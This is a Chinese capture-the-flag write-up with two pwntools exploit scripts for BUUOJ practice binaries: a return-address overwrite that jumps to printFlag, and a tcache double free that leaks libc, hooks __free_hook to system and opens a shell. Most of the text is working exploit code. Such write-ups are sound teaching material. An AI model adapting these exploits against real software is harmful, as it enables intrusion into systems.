在家希望武汉的师傅们一切都好~~
bbys_tu_2016
这道有点没搞清，额额。flag文件是flag.txt，是能control的，但是好像不能ROP；也是能读到flag文件的，就很简单了。还有似乎文件没写好，setbuf函数不会先出现io流。
exp:
#!/usr/bin/python2
from pwn import *
local = 0
# Target selection: a local process for debugging, otherwise the remote service.
# The ELF is loaded from the same binary in both cases (used for symbol lookup).
if local == 1:
    p = process('../binary/bbys_tu_2016')
else:
    p = remote('node3.buuoj.cn', 25744)
elf = ELF('../binary/bbys_tu_2016')
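def exp():
    """Overwrite the saved return address with printFlag and hand over the session.

    The page's payload places the return address 0x18 bytes past the start of
    the overflowed buffer; jumping straight to printFlag means no ROP chain is
    needed. The unused `main = 0x080485C9` local from the original was dropped.
    Uses the module-level `p` (connection) and `elf` (symbol table).
    """
    # Python 2: str payload, p32 returns str as well.
    payload = 'a' * 0x18 + p32(elf.sym['printFlag'])
    p.sendline(payload)
    p.interactive()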
if __name__=="__main__":
    # Entry point; the connection selected above is already open here.
    exp()
xm_2019_awd_pwn2
直接tcache double free拿到free_hook，甚至都不会检查size是否存在，使得漏洞利用变得极为的简单。打到free_hook写成system，然后布置好chunk，free拿到shell。
exp:
#!/usr/bin/python2
from pwn import *
local = 0
# Target selection: a local process for debugging, otherwise the remote service.
# ELF and its libc are resolved from the same binary either way.
if local == 1:
    p = process('./xm_2019_awd_pwn2')
else:
    p = remote('node3.buuoj.cn', 25112)
elf = ELF('./xm_2019_awd_pwn2')
libc = elf.libc
def add(size, content):
    """Menu option 1: allocate a chunk of `size` bytes and fill it with `content`."""
    dialogue = (('>>', '1'), ('size:', str(size)), ('content:', content))
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 2: free the chunk at index `idx`."""
    dialogue = (('>>', '2'), ('idx:', str(idx)))
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu option 3: print the contents of the chunk at index `idx`."""
    dialogue = (('>>', '3'), ('idx:', str(idx)))
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def lg(address, data):
    """Log `data` as hex under the label `address` through pwntools' success logger."""
    return log.success('%s: %s' % (address, hex(data)))
def exp():
    """Leak libc through a freed chunk, then redirect __free_hook to system.

    Every offset and index below is tied to this binary's menu and the libc it
    runs against; the sequence of calls is order-sensitive.  Uses the
    module-level `p`, `libc` and the add/delete/show helpers.
    """
    # Two chunks larger than the tcache range; freeing #0 should place it in
    # the unsorted bin with its fd pointing into main_arena, and show(0) reads
    # that pointer back (the read-after-free the writeup relies on).
    add(0x500,'doudou') #0
    add(0x500,'douodu1') #1
    delete(0)
    show(0)
    # Leaked fd -> libc base.  The "-0x10-96" arithmetic assumes main_arena
    # starts 0x10 past __malloc_hook and the leak is main_arena+96; that holds
    # for this target's libc but is not universal — re-derive for another build.
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
    #lg('libcbase',libcbase)
    system=libcbase+libc.sym['system']
    free_hook=libcbase+libc.sym['__free_hook']
    # Same index freed twice: a tcache double free.  glibc 2.29+ detects this
    # via the tcache entry key field; the prose notes this target performs no
    # such check, which is what makes the rest of the chain work.
    add(0x60,'doudou1')#2
    add(0x60,'doudou2')#3
    delete(2)
    delete(2)
    # First allocation rewrites the freed chunk's next pointer to __free_hook;
    # the second pops the chunk itself; the third is served from __free_hook
    # and overwrites it with the address of system.
    # NOTE(review): the #4/#5/#6 labels look off by one — if indices are
    # sequential, p64(free_hook) is #4 and '/bin/sh' is #7, which matches the
    # final delete below; verify against the binary's index scheme.
    add(0x60,p64(free_hook))
    add(0x60,'doudou3')#4
    add(0x60,p64(system))#5
    add(0x20,'/bin/sh\x00')#6
    lg('libcbase',libcbase)
    # Freeing the '/bin/sh' chunk calls the hooked free -> system("/bin/sh").
    # This is delete(7) spelled out inline; the helper would be clearer.
    p.sendlineafter('>>','2')
    p.sendlineafter('idx:','7')
    p.interactive()
if __name__=="__main__":
    # Entry point; the connection selected above is already open here.
    exp()